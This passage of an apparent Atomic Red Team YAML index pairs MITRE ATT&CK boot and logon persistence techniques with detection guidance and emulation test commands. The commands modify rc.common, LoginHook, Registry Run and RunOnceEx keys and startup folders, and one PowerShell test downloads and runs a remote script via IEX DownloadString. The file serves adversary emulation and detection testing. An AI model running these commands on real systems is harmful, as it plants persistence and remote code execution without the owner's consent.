system takes control.(Citation: Wikipedia Booting) - - Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. 
This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses. - name: Pre-OS Boot - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1542 - url: https://attack.mitre.org/techniques/T1542 - - source_name: Wikipedia Booting - url: https://en.wikipedia.org/wiki/Booting - description: Wikipedia. (n.d.). Booting. Retrieved November 13, 2019. - - url: https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html - description: Pinola, M. (2014, December 14). 3 tools to check your hard drive's - health and make sure it's not already dying on you. Retrieved October 2, - 2018. - source_name: ITWorld Hard Disk Health Dec 2014 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-10-22T16:35:54.740Z' - created: '2019-11-13T14:44:49.439Z' - x_mitre_platforms: - - Linux - - Windows - - Network - x_mitre_data_sources: - - VBR - - MBR - - Component firmware - - Process monitoring - - Disk forensics - - EFI - - BIOS - - API monitoring - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_defense_bypassed: - - Anti-virus - - Host intrusion prevention systems - - File monitoring - x_mitre_version: '1.1' - x_mitre_detection: |- - Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching. - - Disk check, forensic utilities, and data from device drivers (i.e. 
processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014) - x_mitre_is_subtechnique: false - atomic_tests: [] - T1547.012: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.012 - url: https://attack.mitre.org/techniques/T1547/012 - - source_name: Microsoft AddPrintProcessor May 2018 - url: https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor - description: Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved - October 5, 2020. - - source_name: ESET PipeMon May 2020 - url: https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ - description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti - Group. Retrieved August 24, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Print Processors - description: "Adversaries may abuse print processors to run malicious DLLs during - system boot for persistence and/or privilege escalation. Print processors - are DLLs that are loaded by the print spooler service, spoolsv.exe, during - boot. \n\nAdversaries may abuse the print spooler service by adding print - processors that load malicious DLLs at startup. A print processor can be installed - through the AddPrintProcessor API call with an account that has - SeLoadDriverPrivilege enabled. Alternatively, a print processor - can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet - or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: - e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry - key that points to the DLL. 
For the print processor to be correctly installed, - it must be located in the system print-processor directory that can be found - with the GetPrintProcessorDirectory API call.(Citation: Microsoft - AddPrintProcessor May 2018) After the print processors are installed, the - print spooler service, which starts during boot, must be restarted in order - for them to run.(Citation: ESET PipeMon May 2020) The print spooler service - runs under SYSTEM level permissions, therefore print processors installed - by an adversary may run under elevated privileges." - id: attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-10-09T16:05:36.344Z' - created: '2020-10-05T13:24:49.780Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: |- - Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver or HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver as they pertain to print processor installations. - - Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious. 
- x_mitre_data_sources: - - Process monitoring - - Windows Registry - - File monitoring - - DLL monitoring - - API monitoring - x_mitre_contributors: - - Mathieu Tartare, ESET - x_mitre_platforms: - - Windows - atomic_tests: [] - T1542.004: - technique: - created: '2020-10-20T00:05:48.790Z' - modified: '2020-10-22T02:18:19.568Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - type: attack-pattern - id: attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc - description: |- - Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks) - - - ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect. - name: ROMMONkit - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1542.004 - url: https://attack.mitre.org/techniques/T1542/004 - - source_name: Cisco Synful Knock Evolution - url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices - description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco - IOS devices. Retrieved October 19, 2020. 
- - source_name: Cisco Blog Legacy Device Attacks - url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 - description: Omar Santos. (2020, October 19). Attackers Continue to Target - Legacy Devices. Retrieved October 20, 2020. - x_mitre_platforms: - - Network - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_detection: There are no documented means for defenders to validate the - operation of the ROMMON outside of vendor support. If a network device is - suspected of being compromised, contact the vendor to assist in further investigation. - x_mitre_permissions_required: - - Administrator - x_mitre_data_sources: - - File monitoring - - Netflow/Enclave netflow - - Network protocol analysis - - Packet capture - atomic_tests: [] - T1037.004: - technique: - id: attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211 - description: |- - Adversaries may use rc.common automatically executed at boot initialization to establish persistence. During the boot process, macOS executes source /etc/rc.common, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated mechanism in favor of [Launch Agent](https://attack.mitre.org/techniques/T1543/001) and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) but is currently still used. - - Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user. 
(Citation: Methods of Mac Malware Persistence) - name: Rc.common - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1037.004 - url: https://attack.mitre.org/techniques/T1037/004 - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html - description: Apple. (2016, September 13). Startup Items. Retrieved July 11, - 2017. - source_name: Startup Items - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T23:46:20.433Z' - created: '2020-01-15T16:25:22.260Z' - x_mitre_platforms: - - macOS - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_detection: 'The /etc/rc.common file can be monitored to - detect changes from the company policy. Monitor process execution resulting - from the rc.common script for unusual or unknown applications or behavior. 
' - x_mitre_permissions_required: - - root - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1037.004 - atomic_tests: - - name: rc.common - auto_generated_guid: 97a48daa-8bca-4bc0-b1a9-c1d163e762de - description: | - Modify rc.common - - [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) - supported_platforms: - - macos - executor: - command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello - World"'' >> /etc/rc.common - -' - elevation_required: true - name: bash - T1547.007: - technique: - created: '2020-01-24T18:15:06.641Z' - modified: '2020-01-24T19:51:37.795Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e - description: "Adversaries may modify plist files to automatically run an application - when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain - applications to be re-opened when a user logs into their machine after reboot. - While this is usually done via a Graphical User Interface (GUI) on an app-by-app - basis, there are property list files (plist) that contain this information - as well located at ~/Library/Preferences/com.apple.loginwindow.plist - and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. - \n\nAn adversary can modify one of these files directly to include a link - to their malicious executable to provide a persistence mechanism each time - the user reboots their machine (Citation: Methods of Mac Malware Persistence)." 
- name: Re-opened Applications - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547.007 - url: https://attack.mitre.org/techniques/T1547/007 - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - x_mitre_platforms: - - macOS - x_mitre_data_sources: - - File monitoring - x_mitre_detection: Monitoring the specific plist files associated with reopening - applications can indicate when an application has registered itself to be - reopened. - x_mitre_permissions_required: - - User - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1547.007 - atomic_tests: - - name: Re-Opened Applications - auto_generated_guid: 5fefd767-ef54-4ac6-84d3-751ab85e8aba - description: | - Plist Method - - [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) - supported_platforms: - - macos - executor: - steps: | - 1. 
create a custom plist: - - ~/Library/Preferences/com.apple.loginwindow.plist - - or - - ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist - name: manual - - name: Re-Opened Applications - auto_generated_guid: 5f5b71da-e03f-42e7-ac98-d63f9e0465cb - description: | - Mac Defaults - - [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) - supported_platforms: - - macos - input_arguments: - script: - description: path to script - type: path - default: "/path/to/script" - executor: - command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} - -' - cleanup: 'sudo defaults delete com.apple.loginwindow LoginHook - -' - elevation_required: true - name: sh - T1108: - technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1108 - url: https://attack.mitre.org/techniques/T1108 - - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf - description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage - Units. Retrieved July 18, 2016. - source_name: Mandiant APT1 - description: "**This technique has been deprecated. Please use [Create Account](https://attack.mitre.org/techniques/T1136), - [Web Shell](https://attack.mitre.org/techniques/T1505/003), and [External - Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.**\n\nAdversaries - may use more than one remote access tool with varying command and control - protocols or credentialed access to remote services so they can maintain access - if an access mechanism is detected or mitigated. \n\nIf one type of tool is - detected and blocked or removed as a response but the organization did not - gain a full understanding of the adversary's tools and access, then the adversary - will be able to retain access to the network. 
Adversaries may also attempt - to gain access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) - to use [External Remote Services](https://attack.mitre.org/techniques/T1133) - such as external VPNs as a way to maintain access despite interruptions to - remote access tools deployed within a target network.(Citation: Mandiant APT1) - Adversaries may also retain access through cloud-based infrastructure and - applications.\n\nUse of a [Web Shell](https://attack.mitre.org/techniques/T1100) - is one such way to maintain access to a network through an externally accessible - Web server." - name: Redundant Access - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--6aabc5ec-eae6-422c-8311-38d45ee9838a - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-30T13:47:29.922Z' - created: '2017-05-31T21:31:18.867Z' - x_mitre_deprecated: true - x_mitre_is_subtechnique: false - x_mitre_version: '3.0' - x_mitre_data_sources: - - Office 365 account logs - - Azure activity logs - - AWS CloudTrail logs - - Stackdriver logs - - Process monitoring - - Process use of network - - Packet capture - - Network protocol analysis - - File monitoring - - Authentication logs - - Binary file metadata - x_mitre_defense_bypassed: - - Network intrusion detection system - - Anti-virus - x_mitre_detection: |- - Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost. 
- - Detection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators. - - If an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation. - - For alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information. - x_mitre_platforms: - - Linux - - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - SaaS - - Azure AD - x_mitre_permissions_required: - - User - - Administrator - - SYSTEM - x_mitre_contributors: - - Praetorian - atomic_tests: [] - T1547.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.001 - url: https://attack.mitre.org/techniques/T1547/001 - - external_id: CAPEC-270 - source_name: capec - url: https://capec.mitre.org/data/definitions/270.html - - url: http://msdn.microsoft.com/en-us/library/aa376977 - description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November - 12, 2014. - source_name: Microsoft Run Key - - source_name: Microsoft Wow6432Node 2018 - url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry - description: Microsoft. (2018, May 31). 32-bit and 64-bit Application Data - in the Registry. Retrieved August 3, 2020. 
- - source_name: Malwarebytes Wow6432Node 2016 - url: https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/ - description: Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved - August 3, 2020. - - url: https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key - description: Microsoft. (2018, August 20). Description of the RunOnceEx Registry - Key. Retrieved June 29, 2018. - source_name: Microsoft RunOnceEx APR 2018 - - url: https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ - description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden - from Autoruns.exe. Retrieved June 29, 2018. - source_name: Oddvar Moe RunOnceEx Mar 2018 - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Registry Run Keys / Startup Folder - description: |- - Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level. - - Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. 
The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. - - The following run keys are created by default on Windows systems: - - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce - * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run - * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce - - Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) - - The following Registry keys can be used to set startup folder items for persistence: - - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders - * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders - * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders - - The following Registry keys can control automatic startup of services during boot: - - * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce - * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices - - Using policy settings to specify startup 
programs creates corresponding values in either of two Registry keys: - - * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run - - The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs. - - Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on. - - By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot. - - Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. 
- id: attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-08-03T16:30:26.918Z' - created: '2020-01-23T22:02:48.566Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data. - - Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_data_sources: - - Windows Registry - - File monitoring - x_mitre_contributors: - - Oddvar Moe, @oddvarmoe - x_mitre_platforms: - - Windows - identifier: T1547.001 - atomic_tests: - - name: Reg Key Run - auto_generated_guid: e55be3fd-3521-4610-9d1a-e210e42dcf05 - description: "Run Key Persistence\n\nUpon successful execution, cmd.exe will - modify the registry by adding \\\"Atomic Red Team\\\" to the Run key. Output - will be via stdout. 
\n" - supported_platforms: - - windows - input_arguments: - command_to_execute: - description: Thing to Run - type: Path - default: C:\Path\AtomicRedTeam.exe - executor: - command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V - "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" - -' - cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" - /V "Atomic Red Team" /f >nul 2>&1 - -' - name: command_prompt - - name: Reg Key RunOnce - auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb - description: "RunOnce Key Persistence.\n\nUpon successful execution, cmd.exe - will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will - be via stdout. \n" - supported_platforms: - - windows - input_arguments: - thing_to_execute: - description: Thing to Run - type: Path - default: C:\Path\AtomicRedTeam.dll - executor: - command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend - /v 1 /d "#{thing_to_execute}" - -' - cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend - /v 1 /f >nul 2>&1 - -' - name: command_prompt - elevation_required: true - - name: PowerShell Registry RunOnce - auto_generated_guid: eb44f842-0457-4ddc-9b92-c4caa144ac42 - description: | - RunOnce Key Persistence via PowerShell - Upon successful execution, a new entry will be added to the runonce item in the registry. 
- supported_platforms: - - windows - input_arguments: - thing_to_execute: - description: Thing to Run - type: Path - default: powershell.exe - reg_key_path: - description: Path to registry key to update - type: Path - default: HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce - executor: - command: | - $RunOnceKey = "#{reg_key_path}" - set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"' - cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" - -Force -ErrorAction Ignore - -' - name: powershell - elevation_required: true - - name: Suspicious vbs file run from startup Folder - auto_generated_guid: 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 - description: "vbs files can be placed in and ran from the startup folder to - maintain persistance. Upon execution, \"T1547.001 Hello, World VBS!\" will - be displayed twice. 
\nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start - Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted - and the user logs in.\n" - supported_platforms: - - windows - executor: - command: | - Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" - Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" - cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" - cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" - cleanup_command: | - Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore - Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore - name: powershell - elevation_required: true - - name: Suspicious jse file run from startup Folder - auto_generated_guid: dade9447-791e-4c8f-b04b-3a35855dfa06 - description: "jse files can be placed in and ran from the startup folder to - maintain persistance.\nUpon execution, \"T1547.001 Hello, World JSE!\" will - be displayed twice. 
\nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start - Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted - and the user logs in.\n" - supported_platforms: - - windows - executor: - command: | - Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" - Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" - cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" - cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" - cleanup_command: | - Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore - Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore - name: powershell - elevation_required: true - - name: Suspicious bat file run from startup Folder - auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e - description: | - bat files can be placed in and executed from the startup folder to maintain persistance. - Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" - folder and will also run when the computer is restarted and the user logs in. 
- supported_platforms: - - windows - executor: - command: | - Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" - Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" - Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" - Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" - cleanup_command: | - Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore - Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore - name: powershell - elevation_required: true - - name: Add Executable Shortcut Link to User Startup Folder - auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d - description: 'Adds a non-malicious executable shortcut link to the current users - startup directory. Test can be verified by going to the users startup directory - and checking if the shortcut link exists. 
' - supported_platforms: - - windows - executor: - command: "$Target = \"C:\\Windows\\System32\\calc.exe\"\n$ShortcutLocation - = \"$home\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc_exe.lnk\"\n$WScriptShell - = New-Object -ComObject WScript.Shell\n$Create = $WScriptShell.CreateShortcut($ShortcutLocation)\n$Create.TargetPath - = $Target\n$Create.Save() " - cleanup_command: Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start - Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore - name: powershell - elevation_required: true - T1505.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1505.001 - url: https://attack.mitre.org/techniques/T1505/001 - - source_name: NetSPI Startup Stored Procedures - url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/ - description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via - SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.' - - source_name: Kaspersky MSSQL Aug 2019 - url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/ - description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote - attack on Microsoft SQL Server. Retrieved September 4, 2019.' - - source_name: Microsoft xp_cmdshell 2017 - url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017 - description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved - September 9, 2019. - - source_name: Microsoft CLR Integration 2017 - url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017 - description: Microsoft. (2017, June 19). Common Language Runtime Integration. - Retrieved July 8, 2019. - - source_name: NetSPI SQL Server CLR - url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/ - description: Sutherland, S. 
